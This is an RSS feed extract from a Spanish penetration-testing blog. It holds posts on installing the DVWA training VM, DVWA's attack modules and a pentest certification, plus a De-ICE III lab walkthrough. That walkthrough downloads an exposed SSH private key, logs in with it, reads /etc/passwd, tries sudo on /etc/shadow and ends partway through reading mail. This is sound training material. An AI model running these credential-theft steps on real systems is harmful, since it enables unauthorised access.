		<link>http://www.sec-track.com/implementacion-de-damn-vulnerable-web-application-con-vmware-qemu-y-virtualbox</link>
		<comments>http://www.sec-track.com/implementacion-de-damn-vulnerable-web-application-con-vmware-qemu-y-virtualbox#comments</comments>
		<pubDate>Wed, 15 Sep 2010 22:23:43 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[DVWA]]></category>
		<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[Qemu]]></category>
		<category><![CDATA[VirtualBox]]></category>
		<category><![CDATA[Virtualización]]></category>
		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=770</guid>
		<description><![CDATA[Este post muestra los procedimientos necesarios para implementar el entorno de entrenamiento DVWA (Damn Vulnerable Web Application) sobre diferentes soluciones de virtualización (VMWare, Qemu y VirtualBox). Veamos primero, los pasos para llevarlo a cabo en VMWare WorkStation. Menu &#8211; File &#8211; New Virtual Machine Continuamos el paso a paso del wizard de creación de máquinas [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Este post muestra los procedimientos necesarios para implementar el entorno de entrenamiento <a href="http://www.sec-track.com/dvwa-framework-de-entrenamiento-en-explotacion-de-seguridad-web" target="_blank"><strong>DVWA (Damn Vulnerable Web Application)</strong></a> sobre diferentes soluciones de virtualización (VMWare, Qemu y VirtualBox). Veamos primero, los pasos para llevarlo a cabo en VMWare WorkStation.</p>
<p style="text-align: justify;">Menu &#8211; File &#8211; New Virtual Machine</p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img715.imageshack.us/img715/2413/24191063.jpg" alt="" width="471" height="274" /></p>
<p style="text-align: justify;">Continuamos el paso a paso del wizard de creación de máquinas virtuales ilustado en las siguientes imágenes.</p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img822.imageshack.us/img822/2739/88160904.jpg" alt="" width="432" height="392" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img412.imageshack.us/img412/3743/91999314.jpg" alt="" width="356" height="389" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img841.imageshack.us/img841/7286/91391738.jpg" alt="" width="436" height="389" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img718.imageshack.us/img718/4517/46218187.jpg" alt="" width="436" height="390" /></p>
<p style="text-align: justify;">Finalmente ejecutamos la nueva máquina creada, desde allí podemos seleccionar el sistema de inicio o instalación (si preferimos hacerlo):</p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img834.imageshack.us/img834/2614/13383203.jpg" alt="" width="503" height="315" /></p>
<p style="text-align: justify;">Automaticamente inicia <a href="http://www.sec-track.com/dvwa-framework-de-entrenamiento-en-explotacion-de-seguridad-web" target="_blank"><strong>DVWA</strong></a></p>
<p style="text-align: justify;"><img class="aligncenter" title="DVWA" src="http://img651.imageshack.us/img651/3874/27111926.jpg" alt="" width="550" height="149" /></p>
<p style="text-align: justify;">Si verificamos nuestra configuración de red, podremos identificar la dirección IP en la cual ya se encuentra disponible el entorno.</p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img810.imageshack.us/img810/2550/91526082.jpg" alt="" width="550" height="322" /></p>
<p style="text-align: justify;">Si escribimos dicha dirección IP en nuestro navegador, nos encontraremos con la página de login de <a href="http://www.sec-track.com/dvwa-framework-de-entrenamiento-en-explotacion-de-seguridad-web" target="_blank"><strong>DVWA</strong></a>.</p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img9.imageshack.us/img9/76/99122739.jpg" alt="" width="421" height="372" />Además si deseamos podemos trabajar desde el propio LiveCD, para ello simplemente ejecutamos el entorno gráfico de <a href="http://www.sec-track.com/dvwa-framework-de-entrenamiento-en-explotacion-de-seguridad-web" target="_blank"><strong>DVWA </strong></a>y el navegador web. Este automáticamente abrirá la página de login del Framework.</p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img178.imageshack.us/img178/990/67182520.jpg" alt="" width="550" height="501" /></p>
<p style="text-align: justify;">Iniciamos sesión en <a href="http://www.sec-track.com/dvwa-framework-de-entrenamiento-en-explotacion-de-seguridad-web" target="_blank"><strong>DVWA </strong></a>(<strong>user:</strong> <em>admin</em> <strong>pass:</strong><em> password</em>) y nos encontraremos con todos los módulos de entrenamiento.</p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img638.imageshack.us/img638/747/60871223.jpg" alt="" width="550" height="325" /></p>
<p style="text-align: justify;">Veamos ahora el mismo proceso de configuración y puesta en marcha en el software para virtualziación Virtual Box.</p>
<p style="text-align: justify;">Creación de nueva máquina y configuración de acceso a red (en mi caso NAT)</p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img214.imageshack.us/img214/2594/17249277.jpg" alt="" width="480" height="358" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img840.imageshack.us/img840/9311/51841408.jpg" alt="" width="550" height="405" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img256.imageshack.us/img256/8585/37647166.jpg" alt="" width="547" height="396" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img835.imageshack.us/img835/3458/97564122.jpg" alt="" width="456" height="405" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img834.imageshack.us/img834/6610/24159294.jpg" alt="" width="398" height="376" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img19.imageshack.us/img19/3082/32529704.jpg" alt="" width="512" height="317" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img22.imageshack.us/img22/2127/41726645.jpg" alt="" width="362" height="348" /></p>
<p style="text-align: justify;">Si ejecutamos el browser desde la misma máquina en virtual box, nos encontraremos igualmente con la página de inicio del <a href="http://www.sec-track.com/dvwa-framework-de-entrenamiento-en-explotacion-de-seguridad-web" target="_blank"><strong>DVWA</strong></a>.</p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img214.imageshack.us/img214/7169/98589516.jpg" alt="" width="550" height="505" /></p>
<p style="text-align: justify;">Finalmente veamos el proceso de implementación de <a href="http://www.sec-track.com/dvwa-framework-de-entrenamiento-en-explotacion-de-seguridad-web" target="_blank"><strong>DVWA </strong></a>en QEMU</p>
<p style="text-align: justify;">Desde el Qemu Manager</p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img411.imageshack.us/img411/9506/96461598.jpg" alt="" width="369" height="360" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img205.imageshack.us/img205/139/27835991.jpg" alt="" width="550" height="420" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img828.imageshack.us/img828/9051/32829908.jpg" alt="" width="534" height="380" /></p>
<p style="text-align: justify;">Seleccionamos la mejor opción que se acomode a nuestras caracteristicas de red. En mi caso decidí utilizar una interfaz virtual (tap qemu).</p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img688.imageshack.us/img688/487/27790988.jpg" alt="" width="194" height="361" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img684.imageshack.us/img684/9352/17639433.jpg" alt="" width="273" height="279" /></p>
<p style="text-align: justify;">Continuamos con la configuración normal, seleccionado la imagen ISO de <a href="http://www.sec-track.com/dvwa-framework-de-entrenamiento-en-explotacion-de-seguridad-web" target="_blank"><strong>DVWA</strong></a></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img823.imageshack.us/img823/9104/89530523.jpg" alt="" width="379" height="312" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img641.imageshack.us/img641/1882/44693529.jpg" alt="" width="421" height="338" />Verificamos el acceso</p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img687.imageshack.us/img687/7445/19772447.jpg" alt="" width="550" height="348" /></p>
<p style="text-align: justify;"><img class="aligncenter" title="dvwa" src="http://img841.imageshack.us/img841/697/18936833.jpg" alt="" width="550" height="441" /></p>
<p style="text-align: justify;">En próximos post veremos como realizar uno a uno cada módulo de entrenamiento&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/implementacion-de-damn-vulnerable-web-application-con-vmware-qemu-y-virtualbox/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>DVWA &#8211; Framework de Entrenamiento en Explotación de Seguridad Web</title>
		<link>http://www.sec-track.com/dvwa-framework-de-entrenamiento-en-explotacion-de-seguridad-web</link>
		<comments>http://www.sec-track.com/dvwa-framework-de-entrenamiento-en-explotacion-de-seguridad-web#comments</comments>
		<pubDate>Mon, 13 Sep 2010 22:43:54 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Blind SQL Injection]]></category>
		<category><![CDATA[DVWA]]></category>
		<category><![CDATA[LFI]]></category>
		<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[RFI]]></category>
		<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[Web Application Security]]></category>
		<category><![CDATA[XSRF]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=20</guid>
		<description><![CDATA[DVWA (Damn Vulnerable Web Application) es un reconocido entorno de entrenamiento en explotación de  seguridad Web, que permite estudiar e investigar sobre las diferentes temáticas involucradas en dicho campo. Ahora se encuentra disponible la versión número 1.0.7, y desde hace algún tiempo se distribuye, además de los archivos , un LiveCD (iso) para facilitar aun [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><a href="http://www.dvwa.co.uk/" target="_blank"><strong>DVWA (Damn Vulnerable Web Application)</strong></a> es un reconocido entorno de entrenamiento en explotación de  seguridad Web, que permite estudiar e investigar sobre las diferentes temáticas involucradas en dicho campo.</p>
<p style="text-align: justify;">Ahora se encuentra disponible la versión número 1.0.7, y desde hace algún tiempo se distribuye, además de los archivos , un LiveCD (iso) para facilitar aun más la implementación del entorno de entrenamiento.</p>
<p style="text-align: justify;">Entre las mejoras de esta nueva versión, se destaca la página de ayuda del entorno, la implementación de las prácticas de Blind SQL Injection y la documentación oficial del proyecto.</p>
<p style="text-align: justify;">Las temáticas cubiertas en el Framework, son las siguientes:</p>
<p style="text-align: justify;">Login Brute Force<br />
XSS (Cross-Site Scripting)<br />
LFI (Local File Inclusion)<br />
RFI (Remote File Inclusion)<br />
Command Execution<br />
Upload Script<br />
CSRF (Cross-Site Remote Forgery)<br />
SQL Injection<br />
Blind SQL Injection</p>
<p style="text-align: justify;"><a href="http://www.ethicalhack3r.co.uk/" target="_blank"><strong>Para más información sobre el proyecto Blog &gt;&gt; </strong></a></p>
<p style="text-align: justify;"><a href="http://www.dvwa.co.uk/" target="_blank"><strong>Web Oficial del Proyecto &gt;&gt;</strong></a></p>
<p style="text-align: justify;"><a href="http://www.dvwa.co.uk/DVWA-1.0.7.iso" target="_blank"><strong>Descargar DVWA (ISO)(480Mb) &gt;&gt;</strong></a></p>
<p style="text-align: justify;"><strong>Pronto estaré publicando algunos tutoriales y video tutoriales de la implementación y desarrollo de cada uno de los niveles propuestos en el Framework, obviamente estos recursos serán generados a través de la lista de correo y de los comentarios en el Blog.<br />
</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/dvwa-framework-de-entrenamiento-en-explotacion-de-seguridad-web/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Certified Professional Penetration Tester</title>
		<link>http://www.sec-track.com/certified-professional-penetration-tester</link>
		<comments>http://www.sec-track.com/certified-professional-penetration-tester#comments</comments>
		<pubDate>Thu, 26 Aug 2010 09:48:52 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Certificaciones]]></category>
		<category><![CDATA[Penetration Test]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=744</guid>
		<description><![CDATA[Muy pocas veces hablo sobre mis certificaciones o preparación formal realizada. Esto sobre todo, por el hecho de que no soy  amante de los altos egos de algunos con respecto a estos temas. Otra razón muy importante es debido a que el hecho de tener una certificación o carrera profesional no garantiza en su totalidad [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Muy pocas veces hablo sobre mis certificaciones o preparación formal realizada. Esto sobre todo, por el hecho de que no soy  amante de los altos egos de algunos con respecto a estos temas. Otra razón muy importante es debido a que el hecho de tener una certificación o carrera profesional no garantiza en su totalidad que una persona tenga o no, los conocimientos necesarios para ejercer una labor. Soy de los que piensan que nada mejor que la práctica pura y dura para evaluar la experticia de las personas. Como decimos por ahí, &#8220;la práctica hace al maestro&#8221;.</p>
<p style="text-align: justify;">Toco este tema, debido a que a lo largo de mi carrera profesional e investigaciones relacionadas en la seguridad de la información, he realizado diferentes certificaciones y preparaciones formales en estos campos. Una de estas corresponde al título de este post.</p>
<p style="text-align: justify;">Esta prestigiosa certificación y que muchos se atreven a nombrar como &#8220;<strong>Penetration Testing Pro: the CEH killer</strong>&#8221; es ofrecida por el equipo de <a href="http://www.elearnsecurity.com" target="_blank"><strong>eLearnSecurity</strong></a> en un completo paquete de entrenamiento + certificación. El objetivo a lo largo de esta exigente preparación es aprender trabajando de manera práctica en cada uno de sus módulos propuestos.</p>
<p style="text-align: justify;"><strong>SECTION 1 WEB APPLICATION SECURITY TESTING<br />
OVERVIEW</strong></p>
<ul style="text-align: justify;">
<li>Module 1: Introduction</li>
<li>Module 2: Information Gathering</li>
<li>Module 3: Vulnerability assessment</li>
<li>Module 4: Cross site scripting</li>
<li>Module 5: SQL Injection</li>
<li>Module 6: Advanced Web Attacks</li>
</ul>
<p style="text-align: justify;"><strong>SECTION 2 NETWORK SECURITY TESTING<br />
OVERVIEW</strong></p>
<ul style="text-align: justify;">
<li>Module 1: Information Gathering</li>
<li>Module 2: Scanning</li>
<li>Module 3: Enumeration</li>
<li>Module 4: Sniffing and MITM attacks</li>
<li>Module 5: The Exploitation show</li>
<li>Module 6: Anonymity</li>
</ul>
<p style="text-align: justify;"><strong>SECTION 3 SYSTEM SECURITY<br />
OVERVIEW</strong></p>
<ul style="text-align: justify;">
<li>Module 1: Introduction</li>
<li>Module 2: Cryptography and Password Cracking</li>
<li>Module 3: Buffer Overflow</li>
<li>Module 4: Shellcoding</li>
<li>Module 5: Malware</li>
<li>Module 6: Rootkit coding</li>
</ul>
<p style="text-align: justify;"><strong>Los detalles del curso son:</strong></p>
<ul style="text-align: justify;">
<li>Online course—learn at your own pace</li>
<li>1000+ interactive slides</li>
<li>Learn methodology, be a professional</li>
<li>4 hours of videos</li>
<li>3 authors—3 sections</li>
<li>DVD Backtrack4 + Labs</li>
<li>Silver Certification</li>
<li>Qualifies you for 40 CPE</li>
</ul>
<p style="text-align: justify;">Un completo listado de las temáticas puede encontrarse en el <a href="http://www.elearnsecurity.com/course/penetration_testing/syllabus.pdf" target="_blank"><strong>documento Syllabus oficial</strong></a>.</p>
<p style="text-align: justify;">Además de esto, en el web site <a href="http://www.ethicalhacker.net/content/view/307/24/" target="_blank"><strong>The Ethical Network</strong></a> y en <a href="http://www.darknet.org.uk/2010/05/elearnsecurity-online-penetration-testing-training/" target="_blank"><strong>DarkNet </strong></a>han realizado unos completos reviews sobre el entrenamiento y la certificación, que puede ser de utilidad para quienes estén interesados en realizar este training.</p>
<p style="text-align: justify;">Por este mismo medio estaré publicando mis experiencias, alguna parte del material de entrenamiento (videos, ppts, entornos, sources) y algunos de los ejercicios propuestos, con el objetivo de encontrar otras opiniones, sugerencias y compartir con quienes quieran parte de este valioso recurso y estén proyectando realizarlo de manera oficial.</p>
<p style="text-align: justify;"><a href="http://www.elearnsecurity.com" target="_blank"><strong>Web oficial (Entrenamiento + Certificación) eLearnSecurity</strong></a></p>
<p style="text-align: justify;"><a href="http://www.elearnsecurity.com/course/penetration_testing/preview/player.html" target="_blank"><strong>Demo Training</strong></a></p>
<p style="text-align: justify;"><strong><a href="http://www.darknet.org.uk/2010/05/elearnsecurity-online-penetration-testing-training/" target="_blank">Review (DarkNet)</a></strong></p>
<p style="text-align: justify;"><a href="http://www.ethicalhacker.net/content/view/307/24/" target="_blank"><strong>Review (The Ethical Hacker Network)</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/certified-professional-penetration-tester/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Desarrollo del entorno De-Ice III – Acceso al Sistema y Elevación de Privilegios</title>
		<link>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-%e2%80%93-acceso-al-sistema-y-elevacion-de-privilegios</link>
		<comments>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-%e2%80%93-acceso-al-sistema-y-elevacion-de-privilegios#comments</comments>
		<pubDate>Tue, 01 Jun 2010 11:11:08 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[De-ICE]]></category>
		<category><![CDATA[john the ripper]]></category>
		<category><![CDATA[passwd]]></category>
		<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[shadow]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=520</guid>
		<description><![CDATA[Continúa desde: Desarrollo del entorno De-Ice III – Pruebas de Autenticación y Escaneo de Vulnerabilidades Veamos ahora que podemos hacer con la información encontrada: Index of /~pirrip//.ssh Name Last modified Size Description Parent Directory - id_rsa 05-Jan-2008 20:29 1.6K id_rsa.pub 05-Jan-2008 20:29 393 Apache/2.0.55 (Unix) PHP/5.1.2 Server at 192.168.2.101 Port 80 Esta información corresponde a [...]]]></description>
			<content:encoded><![CDATA[<p>Continúa desde: <strong><a title="Permanent Link to Desarrollo del entorno De-Ice III – Pruebas de Autenticación y Escaneo de Vulnerabilidades" rel="bookmark" href="../desarrollo-del-entorno-de-ice-iii-%e2%80%93-pruebas-de-autenticacion-y-escaneo-de-vulnerabilidades">Desarrollo del entorno De-Ice III – Pruebas de Autenticación y Escaneo de Vulnerabilidades</a></strong></p>
<p>Veamos ahora que podemos hacer con la información encontrada:</p>
<h1>Index of /~pirrip//.ssh</h1>
<pre><img src="http://192.168.2.101/icons/blank.gif" alt="Icon " /> Name                    Last modified      Size  Description
<hr /><img src="http://192.168.2.101/icons/back.gif" alt="[DIR]" /> Parent Directory                             -
<img src="http://192.168.2.101/icons/unknown.gif" alt="[   ]" /> id_rsa                  05-Jan-2008 20:29  1.6K
<img src="http://192.168.2.101/icons/unknown.gif" alt="[   ]" /> id_rsa.pub              05-Jan-2008 20:29  393
<hr /></pre>
<address>Apache/2.0.55 (Unix) PHP/5.1.2 Server at 192.168.2.101 Port 80</address>
<address> </address>
<p style="text-align: justify;"><span id="more-520"></span>Esta información corresponde a la llave digital de acceso del usuario pirrip, muy posiblemente al realizarse la copia de seguridad previa a la migración del sistema, esta se olvidó en el antiguo server.</p>
<p>Descarguemos los archivos:</p>
<p><strong>root@Sec-Track:~/De-Ice2.100# wget http://192.168.2.101/~pirrip//.ssh/id_rsa.pub</strong><br />
&#8211;2010-06-01 02:11:32&#8211;  http://192.168.2.101/~pirrip//.ssh/id_rsa.pub<br />
Connecting to 192.168.2.101:80&#8230; connected.<br />
HTTP request sent, awaiting response&#8230; 200 OK<br />
Length: 393 [text/plain]<br />
Saving to: `id_rsa.pub&#8217;</p>
<p>100%[===========================================================&gt;] 393         &#8211;.-K/s   in 0s</p>
<p>2010-06-01 02:11:32 (44.7 MB/s) &#8211; `id_rsa.pub&#8217; saved [393/393]</p>
<p><strong>root@Sec-Track:~/De-Ice2.100# wget http://192.168.2.101/~pirrip//.ssh/id_rsa</strong><br />
&#8211;2010-06-01 02:11:46&#8211;  http://192.168.2.101/~pirrip//.ssh/id_rsa<br />
Connecting to 192.168.2.101:80&#8230; connected.<br />
HTTP request sent, awaiting response&#8230; 200 OK<br />
Length: 1675 (1.6K) [text/plain]<br />
Saving to: `id_rsa&#8217;</p>
<p>100%[===========================================================&gt;] 1,675       &#8211;.-K/s   in 0s</p>
<p>2010-06-01 02:11:46 (172 MB/s) &#8211; `id_rsa&#8217; saved [1675/1675]</p>
<p><strong>root@Sec-Track:~/De-Ice2.100# ls</strong><br />
id_rsa  id_rsa.pub</p>
<p>Una vez descargadas las llaves, procedemos a copiarlas al directorio /foo/.ssh</p>
<p><strong>root@Sec-Track:~/De-Ice2.100# cp id* /root/.ssh/</strong></p>
<p><strong>root@Sec-Track:~/.ssh# ls</strong><br />
id_rsa  id_rsa.pub  known_hosts</p>
<p>Confirmamos que la llave corresponde al usuario pirrip</p>
<p><strong>root@Sec-Track:~/.ssh# more id_rsa.pub</strong><br />
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA1pfb/CVukUw4Xe67YLEZzVHWNax0zJjI1CfcsoEGylmm<br />
tlA6iXHi41nLshzXu9n536JfM9LFAWGqefBVX7Bzd/fC4+jHS3q89IK9FP7gFPwEmlNHCwPX0ADxDFyB<br />
1lJOFffJ9gVw3VgHCaCPgS70UqJD0hZFDMSDMoBa91PylFQR0m58nMq8DsGRbeC5hTdpLXKfBuW8v/lF<br />
uNEWVWNcZDie82aiJg8WRUUIrzeGZSR3+cG1hi6za67VIi+ce8fFuBvIgaEpvJ0JSIX7zPLUV10ezW1N<br />
QRNplKSam3TIYI3+YwuhlcgpEyliHYReN6v91+um2c6LNy9y/vx2Akci5Q== <strong>pirrip@slax</strong></p>
<p>Por lo tanto realicemos la conexión al sistema objetivo!!</p>
<p><strong>root@Sec-Track:~/.ssh# ssh pirrip@192.168.2.100</strong><br />
The authenticity of host &#8217;192.168.2.100 (192.168.2.100)&#8217; can&#8217;t be established.<br />
RSA key fingerprint is ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10.<br />
Are you sure you want to continue connecting (yes/no)? yes<br />
Warning: Permanently added &#8217;192.168.2.100&#8242; (RSA) to the list of known hosts.<br />
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@<br />
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @<br />
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@<br />
Permissions 0644 for &#8216;/root/.ssh/id_rsa&#8217; are too open.<br />
It is recommended that your private key files are NOT accessible by others.<br />
This private key will be ignored.<br />
bad permissions: ignore key: /root/.ssh/id_rsa<br />
pirrip@192.168.2.100&#8242;s password:</p>
<p>Como vemos las llaves presentan un error de permisos&#8230; Por lo tanto cambiemos estos:</p>
<p><strong>root@Sec-Track:~/.ssh# ls -la</strong><br />
total 20<br />
drwx&#8212;&#8212;  2 root root 4096 Jun  1 02:18 .<br />
drwxr-xr-x 77 root root 4096 Jun  1 02:09 ..<br />
<strong>-r&#8211;r&#8211;r&#8211; </strong> 1 root root 1675 Jun  1 02:17 id_rsa<br />
<strong>-r&#8211;r&#8211;r&#8211;</strong> 1 root root  393 Jun  1 02:17 id_rsa.pub<br />
-rw-r&#8211;r&#8211;  1 root root 1768 Jun  1 02:21 known_hosts<br />
<strong>root@Sec-Track:~/.ssh# chmod 000 id*</strong><br />
<strong>root@Sec-Track:~/.ssh# ls -l</strong>a<br />
total 20<br />
drwx&#8212;&#8212;  2 root root 4096 Jun  1 02:18 .<br />
drwxr-xr-x 77 root root 4096 Jun  1 02:09 ..<br />
<strong>&#8212;&#8212;&#8212;-</strong> 1 root root 1675 Jun  1 02:17 id_rsa<br />
<strong>&#8212;&#8212;&#8212;-</strong> 1 root root  393 Jun  1 02:17 id_rsa.pub<br />
-rw-r&#8211;r&#8211;  1 root root 1768 Jun  1 02:21 known_hosts</p>
<p>Ahora si&#8230; Conectémonos al host</p>
<p><strong>root@Sec-Track:~/.ssh# ssh pirrip@192.168.2.100</strong><br />
Linux 2.6.16.<br />
pirrip@slax:~$</p>
<p style="text-align: justify;">Muy bien&#8230; Ya estamos dentro del sistema objetivo&#8230; Ahora como en  todos los Test de Penetración que hemos realizado, tratemos de escalar privilegios.</p>
<p><strong>pirrip@slax:~$ cat /etc/passwd</strong><br />
<strong>root</strong> <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_mad.gif' alt=':x' class='wp-smiley' /> :0:0::/root:/bin/bash<br />
bin:x:1:1:bin:/bin:<br />
daemon:x:2:2:daemon:/sbin:<br />
adm:x:3:4:adm:/var/log:<br />
lp:x:4:7:lp:/var/spool/lpd:<br />
sync:x:5:0:sync:/sbin:/bin/sync<br />
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown<br />
halt:x:7:0:halt:/sbin:/sbin/halt<br />
mail:x:8:12:mail:/:<br />
news:x:9:13:news:/usr/lib/news:<br />
uucp:x:10:14:uucp:/var/spool/uucppublic:<br />
operator:x:11:0:operator:/root:/bin/bash<br />
games:x:12:100:games:/usr/games:<br />
ftp:x:14:50::/home/ftp:<br />
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:<br />
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash<br />
rpc:x:32:32:RPC portmap user:/:/bin/false<br />
sshd:x:33:33:sshd:/:<br />
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash<br />
pop:x:90:90:POP:/:<br />
nobody:x:99:99:nobody:/:<br />
<strong>pirrip</strong> <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_mad.gif' alt=':x' class='wp-smiley' /> :1000:<strong>10</strong> <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> hilip Pirrip:/home/pirrip:/bin/bash<br />
<strong>magwitch</strong> <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_mad.gif' alt=':x' class='wp-smiley' /> :1001:100:Abel Magwitch:/home/magwitch:/bin/bash<br />
<strong>havisham</strong> <img src='http://www.sec-track.com/wp-includes/images/smilies/icon_mad.gif' alt=':x' class='wp-smiley' /> :1002:100:Estella Havisham:/home/havisham:/bin/bash</p>
<p style="text-align: justify;">Vemos como nuestro usuario pirrip tiene el ID 10&#8230; Comprobemos entonces los grupos.</p>
<p style="text-align: justify;"><strong>pirrip@slax:/tmp$ cat /etc/group</strong><br />
root::0:root<br />
bin::1:root,bin,daemon<br />
daemon::2:root,bin,daemon<br />
sys::3:root,bin,adm<br />
adm::4:root,adm,daemon<br />
tty::5:<br />
disk::6:root,adm<br />
lp::7:lp<br />
mem::8:<br />
kmem::9:<br />
<strong>wheel::10:root</strong><br />
floppy::11:root<br />
mail::12:mail<br />
news::13:news<br />
uucp::14:uucp<br />
man::15:<br />
audio::17:<br />
video::18:<br />
cdrom::19:<br />
games::20:<br />
slocate::21:<br />
utmp::22:<br />
smmsp::25:smmsp<br />
mysql::27:<br />
rpc::32:<br />
sshd::33:sshd<br />
gdm::42:<br />
shadow::43:<br />
ftp::50:<br />
pop::90:pop<br />
scanner::93:<br />
nobody::98:nobody<br />
nogroup::99:<br />
users::100:<br />
console::101:</p>
<p style="text-align: justify;">Por lo tanto podremos utilizar el comando <strong>sudo</strong></p>
<p style="text-align: justify;"><strong>pirrip@slax:/tmp$ cat /etc/shadow</strong><br />
cat: /etc/shadow: Permission denied</p>
<p style="text-align: justify;"><strong>pirrip@slax:/tmp$ sudo cat /etc/shadow</strong></p>
<p>We trust you have received the usual lecture from the local System<br />
Administrator. It usually boils down to these three things:</p>
<p>#1) Respect the privacy of others.<br />
#2) Think before you type.<br />
#3) With great power comes great responsibility.</p>
<p>Password:</p>
<p style="text-align: justify;">Lamentablemente desconocemos nuestro password.</p>
<p style="text-align: justify;">Ahora observaremos en detalle la versión del sistema objetivo y trataremos identificar alguna vulnerabilidad reportada, ubicar algún exploit y ejecutarlo desde la carpeta /tmp</p>
<p><strong>pirrip@slax:~$ uname -r</strong><br />
2.6.16<br />
<strong>pirrip@slax:~$ cd /tmp/</strong><br />
You have mail in /var/mail/pirrip</p>
<p>Para nuestra sorpresa, cuando decidí cambiarme a la carpeta /tmp recibí el mensaje de que tengo un email &#8230; Veamos de que se trata</p>
<p><strong>pirrip@slax:/tmp$ mail</strong><br />
mailx version nail 11.25 7/29/05.  Type ? for help.<br />
&#8220;/var/mail/pirrip&#8221;: 7 messages 7 unread<br />
&gt;U  1 Abel Magwitch      Sun Jan 13 23:53   21/758   Estella<br />
U  2 Estella Havisham   Sun Jan 13 23:53   21/790   welcome to the team<br />
U  3 Abel Magwitch      Sun Jan 13 23:53   21/885   havisham<br />
U  4 Estella Havisham   Mon Jan 14 00:05   21/871   next month<br />
U  5 Abel Magwitch      Mon Jan 14 00:05   21/878   vacation<br />
U  6 Abel Magwitch      Mon Jan 14 00:05   21/925   vacation<br />
U  7 noreply@fermion.he Mon Jan 14 00:05   30/993   Fermion Account Login Reminder<br />
? 1<br />
<strong>Message  1:</strong><br />
From magwitch@slax.example.net  Sun Jan 13 23:53:37 2008<br />
Return-Path: &lt;magwitch@slax.example.net&gt;<br />
From: Abel Magwitch &lt;magwitch@slax.example.net&gt;<br />
Date: Sun, 13 Jan 2008 23:47:48 +0000<br />
To: pirrip@slax.example.net<br />
Subject: Estella<br />
User-Agent: nail 11.25 7/29/05<br />
Content-Type: text/plain; charset=us-ascii<br />
Status: RO</p>
<p>Will do.</p>
<p>?<br />
<strong>Message  2:</strong><br />
From havisham@slax.example.net  Sun Jan 13 23:53:37 2008<br />
Return-Path: &lt;havisham@slax.example.net&gt;<br />
From: Estella Havisham &lt;havisham@slax.example.net&gt;<br />
Date: Sun, 13 Jan 2008 23:50:33 +0000<br />
